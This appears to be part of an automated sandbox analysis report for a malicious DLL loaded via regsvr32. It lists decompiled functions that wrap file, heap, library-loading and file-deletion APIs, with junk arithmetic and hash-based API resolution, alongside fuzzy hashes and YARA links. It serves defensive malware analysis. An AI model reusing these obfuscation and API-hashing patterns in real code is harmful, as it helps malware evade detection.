Instruction ID: 25f50591ddadda24edb89e5a7581fb343bd226570f8abbfdfdee9ea73ee1372d
Opcode Fuzzy Hash: 746cf2251e56d2d4648672c393f6e2f1e1e06d9032b4532ec0f864e48e0de62d
Instruction Fuzzy Hash: AE219774E18209AFCB04DF99C9909BEB7B5FF88304F148599DA15A7354DB31AE81CF90

Uniqueness

Uniqueness Score: -1.00%

Function 1001BF1C Relevance: 1.6, APIs: 1, Instructions: 63
fileCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E1001BF1C(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, WCHAR* _a20, long _a24, long _a36, intOrPtr _a40) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t47;
				void* _t55;
				long _t60;

				_push(_a40);
				_t60 = __edx;
				_push(_a36);
				_push(0);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10009E7D(_t47);
				_v20 = 0x8eb723;
				_v20 = _v20 + 0xdb15;
				_v20 = _v20 ^ 0x00852a30;
				_v16 = 0x113147;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 << 0xa;
				_v16 = _v16 ^ 0x0008263d;
				_v12 = 0x276480;
				_v12 = _v12 + 0x6f6f;
				_v12 = _v12 | 0x7ba60f09;
				_v12 = _v12 * 0x1e;
				_v12 = _v12 ^ 0x7da9aca6;
				_v8 = 0x62f42b;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 3;
				_v8 = _v8 ^ 0x000dc6a5;
				E1001BFF0(0xac802c42, 0xfa, __ecx, __ecx, 0xbf3d9e5c);
				_t55 = CreateFileW(_a20, _a36, _a12, 0, _t60, _a24, 0); // executed
				return _t55;
			}

0x1001bf24
0x1001bf29
0x1001bf2b
0x1001bf2e
0x1001bf2f
0x1001bf30
0x1001bf33
0x1001bf36
0x1001bf39
0x1001bf3c
0x1001bf3f
0x1001bf42
0x1001bf43
0x1001bf44
0x1001bf49
0x1001bf53
0x1001bf5a
0x1001bf61
0x1001bf68
0x1001bf6c
0x1001bf70
0x1001bf77
0x1001bf7e
0x1001bf85
0x1001bf9c
0x1001bfa4
0x1001bfab
0x1001bfb2
0x1001bfb6
0x1001bfba
0x1001bfbe
0x1001bfd1
0x1001bfe8
0x1001bfef

APIs

CreateFileW.KERNEL32(?,?,00852A30,00000000,00050E56,?,00000000), ref: 1001BFE8

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ac7f359d84ee74e8ca426aa0a0a8a4fd471f02a08522ffa2403057c705112b58
Instruction ID: a5ad079ddfa0ac31df0ef3774d91f9d1bc30e2e7502c2c862d30a0e22a434d2f
Opcode Fuzzy Hash: ac7f359d84ee74e8ca426aa0a0a8a4fd471f02a08522ffa2403057c705112b58
Instruction Fuzzy Hash: DD21F47680020DBBCF15DF96C9098DFBFB5FB84748F008198F925A2220D3B28A64DF90

Uniqueness

Uniqueness Score: -1.00%

Function 10011B22 Relevance: 1.6, APIs: 1, Instructions: 59
memoryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E10011B22(long __ecx, void* __edx, intOrPtr _a4, long _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _t44;
				void* _t55;
				signed int _t57;
				void* _t62;
				long _t63;

				_push(_a16);
				_t62 = __edx;
				_t63 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10009E7D(_t44);
				_v12 = 0x22ab7;
				_t57 = 0x25;
				_v12 = _v12 * 0x37;
				_v12 = _v12 / _t57;
				_v12 = _v12 + 0xd1d9;
				_v12 = _v12 ^ 0x00090b04;
				_v16 = 0xc8cc57;
				_v16 = _v16 >> 0x10;
				_v16 = _v16 + 0xffff2520;
				_v16 = _v16 ^ 0xfffe92e9;
				_v20 = 0xc52a4b;
				_v20 = _v20 | 0xae757bf4;
				_v20 = _v20 ^ 0xaef18991;
				_v8 = 0xf15120;
				_v8 = _v8 ^ 0xeebb54a4;
				_v8 = _v8 << 7;
				_v8 = _v8 * 0x37;
				_v8 = _v8 ^ 0xf39e7cda;
				E1001BFF0(0xac802c42, 0xa7, _t57, _t57, 0x96a08a4a);
				_t55 = RtlAllocateHeap(_t62, _t63, _a8); // executed
				return _t55;
			}

0x10011b2a
0x10011b2d
0x10011b2f
0x10011b31
0x10011b34
0x10011b37
0x10011b3a
0x10011b3b
0x10011b3c
0x10011b41
0x10011b50
0x10011b54
0x10011b61
0x10011b64
0x10011b6b
0x10011b72
0x10011b79
0x10011b7d
0x10011b84
0x10011b8b
0x10011b92
0x10011b99
0x10011ba0
0x10011ba7
0x10011bae
0x10011bc2
0x10011bc5
0x10011bd8
0x10011be5
0x10011bec

APIs

RtlAllocateHeap.NTDLL(00000000,005D2A08,FFFE92E9,?,?,?,?,?,?,?,?,00E39F9A,?), ref: 10011BE5

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: fa706059d1593490bdd0f8775815ca30a331f110814017c2da87bf38fa33e79e
Instruction ID: d0d425b45aa9a9f6d610c3e920a00689aa0f8126b2cb960a283d8320a45d68de
Opcode Fuzzy Hash: fa706059d1593490bdd0f8775815ca30a331f110814017c2da87bf38fa33e79e
Instruction Fuzzy Hash: A82132B5D00208FBDF05CFA5C94A8EEBBB5FB80314F108089E814A6261D3B4AB41DF61

Uniqueness

Uniqueness Score: -1.00%

Function 100166C2 Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E100166C2(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t39;
				intOrPtr* _t45;
				void* _t46;
				void* _t51;

				_t51 = __edx;
				E10009E7D(_t39);
				_v12 = 0xe2acc8;
				_v12 = _v12 >> 3;
				_v12 = _v12 + 0xbe17;
				_v12 = _v12 ^ 0x0011993b;
				_v20 = 0xf2f568;
				_v20 = _v20 << 0xe;
				_v20 = _v20 ^ 0xbd5142c5;
				_v8 = 0x6d1128;
				_v8 = _v8 + 0xffff2279;
				_v8 = _v8 << 3;
				_v8 = _v8 << 0xc;
				_v8 = _v8 ^ 0x19de445b;
				_v16 = 0xb26540;
				_v16 = _v16 + 0xffff3889;
				_v16 = _v16 ^ 0x00b459c6;
				_t45 = E1001BFF0(0xee7aaf55, 0x326, __ecx, __ecx, 0x1d46c800);
				_t46 =  *_t45(0, _a20, 0, _a8, _t51, __ecx, __edx, _a4, _a8, 0, 0, _a20, _a24, _a28, _a32); // executed
				return _t46;
			}

0x100166cf
0x100166e4
0x100166e9
0x100166f3
0x100166f7
0x100166fe
0x10016705
0x1001670c
0x10016710
0x10016717
0x1001671e
0x10016725
0x10016729
0x1001672d
0x10016734
0x1001673b
0x10016742
0x10016766
0x10016777
0x1001677e

APIs

SHGetFolderPathW.SHELL32(00000000,060C7659,00000000,00B459C6,?), ref: 10016777

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: e4284d99b965fec255e6808552047daee7f3e91d1dd390b6355c9cd29ba91f34
Instruction ID: 52e6f9726e4b7dbd304e61318c5a5b76c55d74289c49a6a1ffc23bebd90897b8
Opcode Fuzzy Hash: e4284d99b965fec255e6808552047daee7f3e91d1dd390b6355c9cd29ba91f34
Instruction Fuzzy Hash: 861142B2800208FBCF15CFA5CC0A8DEBFB8EF85304F108198E92966210D3B19A65DB90

Uniqueness

Uniqueness Score: -1.00%

Function 1000FCB5 Relevance: 1.6, APIs: 1, Instructions: 50
libraryCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E1000FCB5(void* __ecx, WCHAR* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t36;
				struct HINSTANCE__* _t47;
				signed int _t49;
				signed int _t50;
				WCHAR* _t57;

				_push(_a4);
				_t57 = __edx;
				_push(__edx);
				E10009E7D(_t36);
				_v20 = 0x4781cd;
				_t49 = 7;
				_v20 = _v20 / _t49;
				_v20 = _v20 ^ 0x0004a997;
				_v8 = 0x9f6121;
				_v8 = _v8 | 0x04abbfea;
				_v8 = _v8 ^ 0x44133d53;
				_v8 = _v8 ^ 0x40a32c45;
				_v16 = 0x791f5b;
				_t50 = 0x6e;
				_v16 = _v16 / _t50;
				_v16 = _v16 ^ 0x000d135a;
				_v12 = 0x90c5d0;
				_v12 = _v12 ^ 0x2cafc93f;
				_v12 = _v12 ^ 0x2c381e09;
				E1001BFF0(0xac802c42, 0x347, _t50, _t50, 0xede26741);
				_t47 = LoadLibraryW(_t57); // executed
				return _t47;
			}

0x1000fcbc
0x1000fcbf
0x1000fcc1
0x1000fcc3
0x1000fcc8
0x1000fcd6
0x1000fcdb
0x1000fce0
0x1000fce7
0x1000fcee
0x1000fcf5
0x1000fcfc
0x1000fd03
0x1000fd0d
0x1000fd13
0x1000fd16
0x1000fd1d
0x1000fd24
0x1000fd2b
0x1000fd4f
0x1000fd58
0x1000fd5e

APIs

LoadLibraryW.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 1000FD58

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 8bacd117322b64fd42504966482242d0bc11aa74408019ed1aecf2da1c0dea5e
Instruction ID: 031dc55c3b1f58344b2c48e420bdd783e0c70cefa818c64ca28912174f1a3e10
Opcode Fuzzy Hash: 8bacd117322b64fd42504966482242d0bc11aa74408019ed1aecf2da1c0dea5e
Instruction Fuzzy Hash: A5112E75D00218EBDB18CFE5CC4A8EEBBB5EB44304F10819DE429A6251DBB56B148B91

Uniqueness

Uniqueness Score: -1.00%

Function 6DA3BA30 Relevance: 1.5, APIs: 1, Instructions: 44
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E6DA3BA30(void* __esi, void* __eflags) {
				char* _v8;
				intOrPtr _v12;
				char _v16;
				char* _v20;
				void* __ebp;
				intOrPtr _t17;
				char* _t18;
				void* _t27;
				intOrPtr _t28;
				intOrPtr _t31;
				void* _t32;
				void* _t36;
				void* _t37;

				_t37 = __esi;
				_t17 =  *0x6da81274; // 0x0
				_t18 = E6DA5AB15(_t27, _t32, _t36, _t17); // executed
				_v8 = _t18;
				if(_v8 != 0) {
					_t28 =  *0x6da81274; // 0x0
					_v12 = _t28;
					_v16 = 0;
					_v20 = _v8;
					while(1) {
						__eflags = _v16 -  *0x6da81274; // 0x0
						if(__eflags >= 0) {
							break;
						}
						 *_v20 = _v16;
						_v16 = _v16 + 1;
						_t31 = _v20 + 1;
						__eflags = _t31;
						_v20 = _t31;
					}
					_push(_v8); // executed
					E6DA5AA38(_t27, _t36, _t37, __eflags); // executed
					__eflags = _v16 - _v12;
					if(_v16 != _v12) {
						return 3;
					}
					return 0;
				}
				return 0;
			}

0x6da3ba30
0x6da3ba36
0x6da3ba3c
0x6da3ba44
0x6da3ba4b
0x6da3ba51
0x6da3ba57
0x6da3ba5a
0x6da3ba64
0x6da3ba7b
0x6da3ba7e
0x6da3ba84
0x00000000
0x00000000
0x6da3ba8c
0x6da3ba6f
0x6da3ba75
0x6da3ba75
0x6da3ba78
0x6da3ba78
0x6da3ba93
0x6da3ba94
0x6da3ba9f
0x6da3baa2
0x00000000
0x6da3baa8
0x00000000
0x6da3baa4
0x00000000

APIs

_malloc.LIBCMT ref: 6DA3BA3C

Part of subcall function 6DA5AB15: __FF_MSGBANNER.LIBCMT ref: 6DA5AB38
Part of subcall function 6DA5AB15: __NMSG_WRITE.LIBCMT ref: 6DA5AB3F
Part of subcall function 6DA5AB15: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,6DA63E6D,00000000,00000001,00000000,?,6DA64137,00000018,6DA7ECF8,0000000C,6DA641C8), ref: 6DA5AB8C

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: AllocateHeap_malloc
String ID:
API String ID: 501242067-0
Opcode ID: e8623438f56fc497c26533236129cc4751431797cf4de0e64c8a57680a785264
Instruction ID: 839d486551411ce8879d29af1f5fe95d67565840569a6304db1fffb4cf30e003
Opcode Fuzzy Hash: e8623438f56fc497c26533236129cc4751431797cf4de0e64c8a57680a785264
Instruction Fuzzy Hash: DB012DB0E0C699EFCF01CBE8C550AAEB7B6BB45304F118EA5D811D7300D331AA509B91

Uniqueness

Uniqueness Score: -1.00%

Function 10009EA8 Relevance: 1.5, APIs: 1, Instructions: 44
fileCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E10009EA8(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t35;
				int _t42;
				WCHAR* _t46;

				_push(_a8);
				_t46 = __ecx;
				_push(_a4);
				_push(__ecx);
				E10009E7D(_t35);
				_v20 = 0xb0cce;
				_v20 = _v20 + 0xffff00ee;
				_v20 = _v20 ^ 0x0007bd05;
				_v12 = 0x1e8fca;
				_v12 = _v12 >> 6;
				_v12 = _v12 << 8;
				_v12 = _v12 + 0xffff1da9;
				_v12 = _v12 ^ 0x0077171f;
				_v16 = 0xc679b7;
				_v16 = _v16 + 0x38bf;
				_v16 = _v16 ^ 0x00cf762a;
				_v8 = 0xa3ba51;
				_v8 = _v8 ^ 0xa0d3ead1;
				_v8 = _v8 + 0xe688;
				_v8 = _v8 + 0xffff6d73;
				_v8 = _v8 ^ 0xa079263d;
				E1001BFF0(0xac802c42, 0x385, __ecx, __ecx, 0x77e9f533);
				_t42 = DeleteFileW(_t46); // executed
				return _t42;
			}

0x10009eaf
0x10009eb2
0x10009eb4
0x10009eb8
0x10009eb9
0x10009ebe
0x10009ec8
0x10009ecf
0x10009ed6
0x10009edd
0x10009ee1
0x10009ee5
0x10009eec
0x10009ef3
0x10009efa
0x10009f01
0x10009f08
0x10009f0f
0x10009f16
0x10009f1d
0x10009f24
0x10009f48
0x10009f51
0x10009f57

APIs

DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00E39F9E,00000000), ref: 10009F51

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 05b63ea037540c08496bef69ee0cecfed80cfa419fc6bd7bfec422803f2d9975
Instruction ID: 418f1ef9d6d25acf68a43748a91802fcf8eb4dd854a304eccc5db4d114e40d6a
Opcode Fuzzy Hash: 05b63ea037540c08496bef69ee0cecfed80cfa419fc6bd7bfec422803f2d9975
Instruction Fuzzy Hash: AB1148B2C01619EBDF48DFA4D80A8DEBBB4EF10318F108288E825A6250E7B05B548F91

Uniqueness

Uniqueness Score: -1.00%

Function 6DA4A4F0 Relevance: 1.5, APIs: 1, Instructions: 43
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 96%

			E6DA4A4F0(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				long* _t24;
				intOrPtr _t25;
				intOrPtr* _t30;
				void* _t31;

				_t23 = __ecx;
				_t22 = __ebx;
				_push(4);
				E6DA5C80D(E6DA6E73E, __ebx, __edi, __esi);
				_t30 = __ecx;
				if((0 |  *((intOrPtr*)(_t31 + 8)) != 0x00000000) == 0) {
					L1:
					E6DA44898(_t23);
				}
				if( *_t30 == 0) {
					_t23 =  *0x6da85b2c; // 0x6da85b30
					if(_t23 != 0) {
						L5:
						_t19 = E6DA4A1FC(_t23); // executed
						 *_t30 = _t19;
						if(_t19 == 0) {
							goto L1;
						}
					} else {
						 *((intOrPtr*)(_t31 - 0x10)) = 0x6da85b30;
						 *(_t31 - 4) =  *(_t31 - 4) & 0x00000000;
						_t21 = E6DA4A314(0x6da85b30);
						 *(_t31 - 4) =  *(_t31 - 4) | 0xffffffff;
						_t23 = _t21;
						 *0x6da85b2c = _t21;
						if(_t21 == 0) {
							goto L1;
						} else {
							goto L5;
						}
					}
				}
				_t24 =  *0x6da85b2c; // 0x6da85b30
				_t28 = E6DA4A06E(_t24,  *_t30);
				_t39 = _t28;
				if(_t28 == 0) {
					_t17 =  *((intOrPtr*)(_t31 + 8))();
					_t25 =  *0x6da85b2c; // 0x6da85b30
					_t28 = _t17;
					E6DA4A3BB(_t22, _t25, _t17, _t30, _t39,  *_t30, _t17);
				}
				return E6DA5C8E5(_t28);
			}

0x6da4a4f0
0x6da4a4f0
0x6da4a4f0
0x6da4a4f7
0x6da4a4fc
0x6da4a508
0x6da4a50a
0x6da4a50a
0x6da4a50a
0x6da4a512
0x6da4a514
0x6da4a51c
0x6da4a53f
0x6da4a53f
0x6da4a544
0x6da4a548
0x00000000
0x00000000
0x6da4a51e
0x6da4a523
0x6da4a526
0x6da4a52a
0x6da4a52f
0x6da4a533
0x6da4a535
0x6da4a53d
0x00000000
0x00000000
0x00000000
0x00000000
0x6da4a53d
0x6da4a51c
0x6da4a54c
0x6da4a557
0x6da4a559
0x6da4a55b
0x6da4a55d
0x6da4a560
0x6da4a566
0x6da4a56b
0x6da4a56b
0x6da4a577

APIs

__EH_prolog3.LIBCMT ref: 6DA4A4F7

Part of subcall function 6DA44898: __CxxThrowException@8.LIBCMT ref: 6DA448AE

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: Exception@8H_prolog3Throw
String ID:
API String ID: 3670251406-0
Opcode ID: 7e6b6a9d00619b6104d53cfa92deeaa9e3c22c0b43ecf82c0d25b8fdc434fa04
Instruction ID: f4b25198a3a24a99ec52be7c7c2095ad54d8522a0aa7a19bab7005b4d89e4b86
Opcode Fuzzy Hash: 7e6b6a9d00619b6104d53cfa92deeaa9e3c22c0b43ecf82c0d25b8fdc434fa04
Instruction Fuzzy Hash: CC015A7960C203ABDB149E74C614B3D7AB3AB95319F15C038DA92CB2C0EF3489818B22

Uniqueness

Uniqueness Score: -1.00%

Function 1000BA9C Relevance: 1.5, APIs: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E1000BA9C(int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				void* _t34;

				_v20 = 0x6b4597;
				_v20 = _v20 >> 2;
				_v20 = _v20 ^ 0x00116e69;
				_v16 = 0x7d3df7;
				_v16 = _v16 << 3;
				_v16 = _v16 ^ 0x03ee9fa4;
				_v12 = 0x7e0c35;
				_v12 = _v12 ^ 0xa2581e84;
				_v12 = _v12 ^ 0xa22bc007;
				_v8 = 0xada9ee;
				_push(_t34);
				_v8 = _v8 * 0x61;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x6b103fde;
				E1001BFF0(0xac802c42, 0x166, _t34, _t34, 0x80a33dd2);
				ExitProcess(_a12);
			}

0x1000baa2
0x1000baa9
0x1000baad
0x1000bab4
0x1000babb
0x1000babf
0x1000bac6
0x1000bacd
0x1000bad4
0x1000badb
0x1000bae6
0x1000baee
0x1000baf6
0x1000bafa
0x1000bb12
0x1000bb1d

APIs

ExitProcess.KERNEL32(00116E69), ref: 1000BB1D

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 5a29f8c2dfa274dc4c38ec6c4fc52361ad96745e54715afb883c837706f91096
Instruction ID: 8b053e7fd0c7c19cbffb8e592a3d1a6bbcb506d1d2403606fd79baaff6e70ad2
Opcode Fuzzy Hash: 5a29f8c2dfa274dc4c38ec6c4fc52361ad96745e54715afb883c837706f91096
Instruction Fuzzy Hash: 91010475D1120CEB8B04DFA4CA4A9DEBBB4FB04348F10859DE821B7211D7B55B44CF81

Uniqueness

Uniqueness Score: -1.00%

Function 6DA4494B Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DA4494B(intOrPtr __ecx, intOrPtr _a4, signed int _a8) {
				void* __edi;
				intOrPtr* _t11;
				void* _t13;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t18;

				_t18 = _a4;
				_t17 = __ecx;
				if(_t18 >= 0) {
					_t11 = E6DA5AB15(_t13, _t16, __ecx, (_t18 + 1) * _a8 + 0x10); // executed
					if(_t11 == 0) {
						goto L1;
					}
					 *(_t11 + 4) =  *(_t11 + 4) & 0x00000000;
					 *_t11 = _t17;
					 *((intOrPtr*)(_t11 + 0xc)) = 1;
					 *((intOrPtr*)(_t11 + 8)) = _t18;
					return _t11;
				}
				L1:
				return 0;
			}

0x6da44951
0x6da44955
0x6da44959
0x6da4496a
0x6da44972
0x00000000
0x00000000
0x6da44974
0x6da44978
0x6da4497a
0x6da44981
0x00000000
0x6da44981
0x6da4495b
0x00000000

APIs

_malloc.LIBCMT ref: 6DA4496A

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: _malloc
String ID:
API String ID: 1579825452-0
Opcode ID: 4fc599c95992b5fab480dd2b71a99439ab7e03162a6a391ffb41e38c42abf9ed
Instruction ID: 8b3e5c917329a50e289fb582d09ad2b5abeadb9bc8750d471b11072754c75b45
Opcode Fuzzy Hash: 4fc599c95992b5fab480dd2b71a99439ab7e03162a6a391ffb41e38c42abf9ed
Instruction Fuzzy Hash: 51E06D335186169BC7008F4AC404A86F7EDEF95370F16C426D518CB152C7F1E9958BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6DA4A0DA Relevance: 1.5, APIs: 1, Instructions: 21
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 88%

			E6DA4A0DA(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t19;
				void* _t20;

				_push(8);
				E6DA5C840(E6DA6E6F8, __ebx, __edi, __esi);
				_t19 = __ecx;
				if( *__ecx == 0) {
					E6DA49B8E(0x10);
					 *(_t20 - 4) =  *(_t20 - 4) & 0x00000000;
					if( *__ecx == 0) {
						 *__ecx =  *((intOrPtr*)(_t20 + 8))();
					}
					 *(_t20 - 4) =  *(_t20 - 4) | 0xffffffff;
					E6DA49C00(0x10);
				}
				return E6DA5C8E5( *_t19);
			}

0x6da4a0da
0x6da4a0e1
0x6da4a0e6
0x6da4a0ec
0x6da4a0f0
0x6da4a0f7
0x6da4a0fd
0x6da4a102
0x6da4a102
0x6da4a104
0x6da4a10a
0x6da4a10a
0x6da4a116

APIs

__EH_prolog3_catch.LIBCMT ref: 6DA4A0E1

Part of subcall function 6DA49B8E: EnterCriticalSection.KERNEL32(6DA85A78,?,?,?,?,6DA4A0F5,00000010,00000008,6DA4987C,6DA4981F,6DA3ED9D,6DA45AFA,?,6DA22C88,00000000,00000030), ref: 6DA49BC8
Part of subcall function 6DA49B8E: InitializeCriticalSection.KERNEL32(-6DA858E0,?,?,?,?,6DA4A0F5,00000010,00000008,6DA4987C,6DA4981F,6DA3ED9D,6DA45AFA,?,6DA22C88,00000000,00000030), ref: 6DA49BDA
Part of subcall function 6DA49B8E: LeaveCriticalSection.KERNEL32(6DA85A78,?,?,?,?,6DA4A0F5,00000010,00000008,6DA4987C,6DA4981F,6DA3ED9D,6DA45AFA,?,6DA22C88,00000000,00000030), ref: 6DA49BE7
Part of subcall function 6DA49B8E: EnterCriticalSection.KERNEL32(-6DA858E0,?,?,?,?,6DA4A0F5,00000010,00000008,6DA4987C,6DA4981F,6DA3ED9D,6DA45AFA,?,6DA22C88,00000000,00000030), ref: 6DA49BF7

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: CriticalSection$Enter$H_prolog3_catchInitializeLeave
String ID:
API String ID: 1641187343-0
Opcode ID: d40cd8de9e820cdbcad29ebe5f95736a767497a6a666a975cf262e2b9093a182
Instruction ID: a00787152b001421e08522e7ec7ba0d93b36e907031f43771767b5521064c076
Opcode Fuzzy Hash: d40cd8de9e820cdbcad29ebe5f95736a767497a6a666a975cf262e2b9093a182
Instruction Fuzzy Hash: BBE09A3464C2069BE760DFA8CB45B49B6E0AF00769F1185A8E6D0DA2D8DBB089D09B61

Uniqueness

Uniqueness Score: -1.00%

Function 6DA63F8D Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

